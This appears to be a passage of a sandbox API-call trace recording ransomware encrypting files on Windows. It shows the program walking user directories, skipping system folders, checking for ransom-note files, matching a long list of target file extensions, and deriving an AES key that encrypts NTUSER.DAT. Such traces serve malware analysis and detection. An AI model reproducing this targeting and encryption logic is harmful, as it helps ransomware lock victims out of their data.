	[0179.265] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 0
	[0179.265] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.265] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.266] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1
	[0179.315] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0179.315] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0179.315] lstrcpyW (in: lpString1=0x18dcbc, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0179.315] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0179.315] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.315] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.315] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.315] lstrcpyW (in: lpString1=0x18cda4, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.315] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*"
	[0179.316] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*" (normalized: "c:\\users\\default\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0179.320] lstrlenW (lpString="C:\\Users\\Default\\*.*") returned 20
	[0179.320] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.320] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\*.*", cchLength=0x14 | out: lpsz="c:\\users\\default\\*.*") returned 0x14
	[0179.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.321] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="windows") returned 0x0
	[0179.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.321] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="boot") returned 0x0
	[0179.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.321] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="system volume information") returned 0x0
	[0179.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.322] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.322] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="temp") returned 0x0
	[0179.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.322] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="program files") returned 0x0
	[0179.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.322] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.323] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="appdata") returned 0x0
	[0179.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.323] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="application data") returned 0x0
	[0179.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.323] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="winnt") returned 0x0
	[0179.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.323] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="tmp") returned 0x0
	[0179.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.324] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="cache") returned 0x0
	[0179.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.324] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.324] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="webcache") returned 0x0
	[0179.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.325] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="inetcache") returned 0x0
	[0179.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.325] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="nvidia") returned 0x0
	[0179.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.325] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="packages") returned 0x0
	[0179.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.325] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="cookies") returned 0x0
	[0179.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.326] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="programdata") returned 0x0
	[0179.326] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.327] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1
	[0179.327] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d54d8a8, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d54d8a8, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d54d8a8, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0179.327] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0179.327] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0179.327] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1
	[0179.328] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x31bfa5a5, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xea64ab63, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xea64ab63, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1
	[0179.328] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1
	[0179.328] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1
	[0179.329] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.329] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT"
	[0179.330] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27
	[0179.330] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.330] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\NTUSER.DAT", cchLength=0x1b | out: lpsz="c:\\users\\default\\ntuser.dat") returned 0x1b
	[0179.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.330] StrStrW (lpFirst="c:\\users\\default\\ntuser.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.330] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\default\\ntuser.dat" | out: lpString1="c:\\users\\default\\ntuser.dat") returned="c:\\users\\default\\ntuser.dat"
	[0179.330] lstrlenW (lpString="c:\\users\\default\\ntuser.dat") returned 27
	[0179.330] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.331] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.331] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0179.331] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.331] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0179.331] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.332] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.332] CreateFileW (lpFileName="c:\\users\\default\\ntuser.dat" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.342] ReadFile (in: hFile=0x380, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x18cd70, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18cd70*=0x40000, lpOverlapped=0x0) returned 1
	[0179.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.359] CryptAcquireContextW (in: phProv=0x18c920, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18c920*=0xfcb220) returned 1
	[0179.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.362] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18c924 | out: phHash=0x18c924) returned 1
	[0179.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.363] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0179.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.363] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18c928 | out: phKey=0x18c928*=0xfb97b0) returned 1
	[0179.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.363] CryptEncrypt (in: hKey=0xfb97b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18c93c*=0x40000, dwBufLen=0x40000 | out: pbData=0x0*, pdwDataLen=0x18c93c*=0x40010) returned 1
	[0179.372] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.372] RtlMoveMemory (in: Destination=0x101d188, Source=0xfdd180, Length=0x40000 | out: Destination=0x101d188) 
	[0179.372] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.372] CryptEncrypt (in: hKey=0xfb97b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x101d188*, pdwDataLen=0x18c91c*=0x40000, dwBufLen=0x40010 | out: pbData=0x101d188*, pdwDataLen=0x18c91c*=0x40010) returned 1
	[0179.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.375] CryptDestroyKey (hKey=0xfb97b0) returned 1
	[0179.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.375] CryptDestroyHash (hHash=0xfb9bf0) returned 1
